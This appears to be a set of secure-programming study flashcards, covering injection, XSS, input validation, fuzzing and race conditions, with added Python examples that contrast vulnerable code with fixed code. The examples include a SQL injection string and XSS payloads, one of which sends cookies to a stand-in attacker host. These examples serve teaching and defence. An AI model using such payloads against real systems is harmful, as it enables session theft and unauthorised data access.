Three categories of security vulnerabilities resulting from poor programming?
Insecure interaction between components, risky resource management, porous defenses
What are some software error examples from insecure interactions between components?
SQL injection, OS command injection, cross-site scripting, unrestricted upload of a file with a dangerous type, cross-site request forgery, open redirect
What are some software error examples from risky resource management?
Buffer copy without checking the size of input, path traversal, download of code without an integrity check, use of potentially dangerous functions, integer overflow or wraparound
What are some software error examples from porous defenses?
Missing authentication and authorization, use of hard-coded credentials, missing encryption of sensitive data, reliance on untrusted inputs in a security decision, incorrect access controls, use of a one-way hash without a salt
What are the five critical web application security flaws?
Unvalidated input, cross-site scripting, buffer overflow, injection flaws, improper error handling
T/F: Emphasis should be placed on the need for software developers to address these known areas of concern when addressing critical web application security flaws.
True
Why do critical web application security flaws occur?
They often occur due to a lack of secure coding practices, insufficient testing, and failure to properly validate user inputs.
What is software quality and reliability concerned with?
Accidental failure of a program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code.
How are software quality and reliability improved?
By using structured design and testing to identify and eliminate as many bugs as possible from a program
What is a big concern with software quality and reliability?
How often bugs are triggered rather than how many bugs there are.
What is defensive programming?
Designing and implementing software so that it continues to function even when under attack.
What does defensive programming require attention to?
All aspects of program execution, its environment, and the type of data it processes
T/F: Defensive programming is also known as blue teaming.
False
What is defensive programming also known as?
Secure programming
T/F: Assumptions must be validated by the program and all potential failures must be handled gracefully and safely
True
T/F: Programmers are often sure in what types of input a program will receive and the environment it executes in.
False, they assume rather than verify
What are the steps of the software development lifecycle (SDLC)?
Initiate, define, design, build, test, roll out, operate, dispose
What are the steps of the waterfall development cycle?
Requirement gathering and analysis, system design, implementation, integration and testing, deployment of system, maintenance
What is the agile development cycle?
Agile is based on small project iterations, or sprints, for developing the software instead of long project schedules
T/F: Organizations that use the SDLC produce smaller deliverables more frequently and evaluate a large project in terms of its individual pieces as they are completed.
False, agile development cycle is used to do this
How long is the typical duration of a sprint in the agile development cycle?
One to four weeks
What organization develops publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development?
SAFECode
What is a very common failing when handling program input?
Incorrect handling of program input.
How do you prevent incorrect handling?
Identify all data sources and explicitly validate assumptions on size and types of values before use.
T/F: Programmers often make assumptions about the minimum expected size of input.
False, maximum
T/F: Oftentimes, the allocated buffer size is not confirmed, which leads to buffer overflow.
True
T/F: Safe coding treats all input as secure
False
T/F: Testing of inputs may not identify the vulnerability since the inputs are unlikely to include large enough inputs to trigger the overflow
True
Program input may be _______ or _______.
binary, text
What is a recent example of a failure to check the validity of a binary input value?
2014 Heartbleed OpenSSL bug.
What is an injection attack?
A flaw related to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program.
Where do injection attacks most often occur in?
Scripting languages
What are the two ways to interact with the OS?
Reading and writing system files from disk, and direct command execution
T/F: Both ways to interact with the OS are restricted by privileges and permissions
True
What are some countermeasures of SQL injection attacks?
Secure software development, input validation and sanitization
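The two countermeasures above, shown side by side as an added example (this code is not from the original flashcards). It assumes a small in-memory SQLite table constructed for the demonstration and a hypothetical `validate_username` allow-list; the attack string is constructed as well. The vulnerable query lets the input change the query's structure; the parameterized query keeps data and code separate, and the validation layer rejects the payload before it reaches the database at all.

```python
import sqlite3


def make_db():
    """Constructed sample database for the example (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def find_user_vulnerable(conn, name):
    # Untrusted input is concatenated into the SQL text, so the data can
    # influence the structure of the query: this is the injection flaw.
    query = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    # Parameterized query: the driver binds the value separately from the
    # SQL text, so the input is only ever compared as a string value.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


def validate_username(name):
    """Hypothetical allow-list validation, applied before the value is used.

    Defense in depth: even with parameterized queries, reject input that
    does not match the expected size and character class.
    """
    if not 1 <= len(name) <= 32:
        raise ValueError("username length out of range")
    if not name.isascii() or not all(c.isalnum() or c == "_" for c in name):
        raise ValueError("username contains disallowed characters")
    return name


# Constructed attack string: closes the quoted literal and adds a tautology.
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", find_user_vulnerable(conn, PAYLOAD))  # every row
    print("safe:      ", find_user_safe(conn, PAYLOAD))        # no rows
    try:
        validate_username(PAYLOAD)
    except ValueError as exc:
        print("validation rejected payload:", exc)
```

Run it as a script to see the vulnerable query return all three users for the payload while the parameterized version returns nothing.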
__________ is used for internationalization.
Unicode
T/F: Many Unicode decoders accept any valid equivalent sequence
True
What is canonicalization?
Transforming input data into a single, standard, minimal representation
What happens after canonicalization?
Input data can be compared with a single representation of acceptable input values
T/F: Floating point numbers depend on the processor used
True, the format and precision are processor dependent
T/F: Values may be signed or unsigned in validating numeric input
True
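Canonicalization and numeric validation from the cards above, as one added example (not code from the original flashcards). It assumes UTF-8 as the wire encoding, a hypothetical maximum length `MAX_LEN`, and a hypothetical 16-bit unsigned field; all inputs are constructed. Binary input is decoded strictly so invalid or overlong sequences are rejected, text is reduced to a single NFKC representation before any comparison, and numbers are parsed as ASCII decimal digits and range-checked for their declared width and signedness.

```python
import unicodedata

MAX_LEN = 32  # assumed maximum field length; not from the original page


def canonicalize(data):
    """Transform input into a single, standard, minimal representation.

    Accepts bytes (binary input) or str (text input). NFKC folds
    compatibility forms (fullwidth letters, ligatures) and composes
    combining sequences, so equivalent encodings compare equal afterwards.
    """
    if isinstance(data, bytes):
        # Strict decoding rejects invalid and overlong UTF-8 sequences
        # instead of silently accepting an "equivalent" encoding.
        data = data.decode("utf-8", errors="strict")
    return unicodedata.normalize("NFKC", data).strip()


def validate_name(raw):
    """Validate a text field: canonicalize, then check size and character class."""
    name = canonicalize(raw)
    if not 1 <= len(name) <= MAX_LEN:
        raise ValueError("name length out of range")
    # Unicode general categories starting with 'C' are control, format,
    # surrogate, private-use and unassigned code points.
    if any(unicodedata.category(c).startswith("C") for c in name):
        raise ValueError("name contains a control or format character")
    return name


def parse_uint(raw, bits=16):
    """Validate an unsigned integer of a fixed width (hypothetical 16-bit field)."""
    text = canonicalize(raw)
    # isascii() + isdecimal() rejects signs, whitespace, exponents and
    # non-ASCII digit sets that int() would otherwise accept.
    if not (text.isascii() and text.isdecimal()):
        raise ValueError("not an unsigned decimal integer")
    value = int(text)
    if value >= 2 ** bits:
        raise ValueError("value exceeds %d-bit range" % bits)
    return value


def parse_int(raw, bits=16):
    """Validate a signed two's-complement integer of a fixed width."""
    text = canonicalize(raw)
    body = text[1:] if text[:1] in "+-" else text
    if not (body.isascii() and body.isdecimal()):
        raise ValueError("not a signed decimal integer")
    value = int(text)
    if not -(2 ** (bits - 1)) <= value < 2 ** (bits - 1):
        raise ValueError("value exceeds signed %d-bit range" % bits)
    return value


if __name__ == "__main__":
    # Constructed inputs: fullwidth letters, a ligature, and fullwidth digits
    # all canonicalize to their plain ASCII forms.
    print(validate_name("\uff41\uff44\uff4d\uff49\uff4e") == "admin")
    print(validate_name("\ufb01le") == "file")
    print(parse_uint("\uff11\uff12\uff13"))
```

Comparing the canonical form against the allow-list is the point: checking the raw input first would let the fullwidth spelling of `admin` slip past a comparison with `"admin"`.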
What is input fuzzing?
Software testing technique that uses randomly generated data as inputs to a program to discover vulnerabilities and unexpected behavior.
T/F: Input fuzzing can use templates to generate classes of known problem inputs
True
What is the disadvantage of using templates in input fuzzing?
Bugs triggered by other forms of input would be missed
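The fuzzing cards above, as an added example (not from the original flashcards): a constructed toy `parse_record` target with a deliberate missing-separator bug, a seeded random-input generator, and a template generator that produces classes of known problem inputs. The harness records every unhandled exception. The template run finds the bug deterministically; the random run is kept alongside it because, as the card says, templates only cover the problem classes someone already thought of.

```python
import random


def parse_record(line):
    """Constructed fuzz target: parses 'key=value' but crashes without '='."""
    parts = line.split("=")
    key = parts[0]
    value = parts[1]  # BUG: IndexError when the separator is missing
    return key.strip(), value


def random_inputs(count, rng, max_len=20):
    """Purely random inputs drawn from a small alphabet (seeded for repeatability)."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789=_ "
    for _ in range(count):
        length = rng.randrange(max_len + 1)
        yield "".join(rng.choice(alphabet) for _ in range(length))


def template_inputs():
    """Classes of known problem inputs, generated from templates."""
    yield ""                         # empty input
    yield "key"                      # missing separator
    yield "="                        # separator with empty key and value
    yield "key=" + "A" * 10_000      # oversized value
    yield "key=%s%n%x"               # format-string style content
    yield "key=\x00value"            # embedded NUL
    yield "key=\u202e\u0000"         # Unicode control characters
    yield "=" * 1_000                # many separators


def fuzz(target, inputs):
    """Run target over inputs and return (input, exception) for each crash."""
    crashes = []
    for data in inputs:
        try:
            target(data)
        except Exception as exc:  # any unhandled exception counts as a finding
            crashes.append((data, exc))
    return crashes


def run_campaign(seed=1, random_count=500):
    """Return the crashes found by the template run and by the random run."""
    rng = random.Random(seed)
    return (
        fuzz(parse_record, template_inputs()),
        fuzz(parse_record, random_inputs(random_count, rng)),
    )


if __name__ == "__main__":
    template_crashes, random_crashes = run_campaign()
    print("template run: %d crashes" % len(template_crashes))
    for data, exc in template_crashes:
        print("  %r -> %s: %s" % (data[:40], type(exc).__name__, exc))
    print("random run:   %d crashes in 500 inputs" % len(random_crashes))
```

Every crash found here is an input with no `=` in it, which is exactly the class the "missing separator" template encodes; a bug triggered by some other shape of input would only be reached by the random run, or by a new template once the class is known.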
What are cross site scripting attacks?
Attacks where input provided by one user is subsequently output to another user
XSS attacks are commonly seen in __________
Scripted web applications.
How are XSS attacks carried out?
By including script code in the HTML content of a page that is delivered to other users.
What is the XSS reflection vulnerability?
Attackers include the malicious script content in data supplied to a site, which the site then reflects back in pages served to other users
T/F: The XSS attack assumes that all content from one site is equally trusted and hence is permitted to interact with other content from the site
True
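The reflected XSS case from the cards above, as an added example (not from the original flashcards). It assumes a hypothetical search page that echoes the query back to the user, rendered with plain string building; the attack strings are constructed. The vulnerable renderer places the data into the HTML unchanged, so script in the data runs with the trust of the site; the hardened renderer escapes on output for element content and for attribute values, and allow-lists the URL scheme for links, because escaping alone does nothing against a `javascript:` URL.

```python
import html
from urllib.parse import urlsplit


def render_search_vulnerable(query):
    # The reflected value is inserted verbatim: a query containing
    # <script> becomes part of the page and executes in the viewer's browser.
    return (
        '<form><input name="q" value="' + query + '"></form>'
        "<p>Results for " + query + "</p>"
    )


def render_search_safe(query):
    # html.escape with quote=True neutralizes <, >, &, " and ' so the data can
    # neither close the attribute nor open a tag, in either context.
    safe = html.escape(query, quote=True)
    return (
        '<form><input name="q" value="' + safe + '"></form>'
        "<p>Results for " + safe + "</p>"
    )


def render_link_safe(href, text):
    """Render a user-supplied link; escaping is not enough for URL attributes."""
    scheme = urlsplit(href).scheme.lower()
    if scheme not in ("http", "https"):
        raise ValueError("disallowed URL scheme: %r" % scheme)
    return '<a href="%s">%s</a>' % (
        html.escape(href, quote=True),
        html.escape(text, quote=True),
    )


# Constructed attack strings for the two contexts.
SCRIPT_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'

if __name__ == "__main__":
    print(render_search_vulnerable(SCRIPT_PAYLOAD))
    print(render_search_safe(SCRIPT_PAYLOAD))
    print(render_search_safe(ATTR_PAYLOAD))
    try:
        render_link_safe("javascript:alert(1)", "click")
    except ValueError as exc:
        print("rejected:", exc)
```

The attribute payload shows why the "one escape fits all" habit is still context-sensitive: it never uses `<`, so a renderer that only stripped tags would still let it break out of `value="..."`.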
Security issues mainly arise due to issues in the following:
Correct algorithm implementation, correct machine instructions for the algorithm, valid manipulation of data
T/F: A consequence of an incorrect algorithm implementation results in a bug that could be exploited
True
T/F: Another variant is when programmers deliberately include additional code in a program to help test and debug it
True
T/F: There are no issues with dynamic memory allocation
False, dynamic memory allocation can cause vulnerabilities like memory leaks and buffer overflows.
T/F: Programs execute on systems under the control of a processor clock
False, an operating system
What is a race condition vulnerability?
Occurs when multiple threads or processes have access to the same shared data and attempt to change it at the same time, so the outcome depends on the timing of their accesses.
Applications can become vulnerable to race conditions if they interact with other applications that use ________ or ________.
parallel processing, multiple threads
If shared memory locations are not adequately secured, race conditions can occur, resulting in ________
data corruption, application errors, system crashes
The most common technique to prevent race conditions is ________
acquiring a lock on the shared file or resource for synchronization
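The race condition and its lock-based fix from the cards above, as an added example (not from the original flashcards). It assumes a constructed shared counter updated by several threads; the unsafe path splits the read-modify-write into separate steps with a yield between them to widen the window in which another thread can overwrite the value, and the safe path holds a lock across the whole update. The same pattern applies to a shared file: the lock must cover the check and the update together, not just one of them.

```python
import threading
import time

THREADS = 4
ITERATIONS = 2000


class SharedCounter:
    """Constructed shared resource updated concurrently by several threads."""

    def __init__(self):
        self.value = 0
        self.lock = threading.Lock()

    def increment_unsafe(self):
        current = self.value      # read the shared value
        time.sleep(0)             # yield: another thread may now read the same value
        self.value = current + 1  # write back: overwrites any update made meanwhile

    def increment_safe(self):
        # Acquiring the lock makes the read, the modification and the write
        # one indivisible step from the point of view of other threads.
        with self.lock:
            self.value += 1


def run_threads(increment, threads=THREADS, iterations=ITERATIONS):
    """Run `increment` iterations times on each of `threads` threads."""

    def worker():
        for _ in range(iterations):
            increment()

    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()


def final_count(method_name):
    """Return the counter's value after a concurrent run using the named method."""
    counter = SharedCounter()
    run_threads(getattr(counter, method_name))
    return counter.value


if __name__ == "__main__":
    expected = THREADS * ITERATIONS
    print("expected:   ", expected)
    print("unsafe:     ", final_count("increment_unsafe"))  # usually lower: lost updates
    print("with lock:  ", final_count("increment_safe"))    # always equal to expected
```

The unsafe result varies from run to run, which is the defining symptom of a race: the program is not wrong every time, only when the scheduler interleaves two updates between one thread's read and its write.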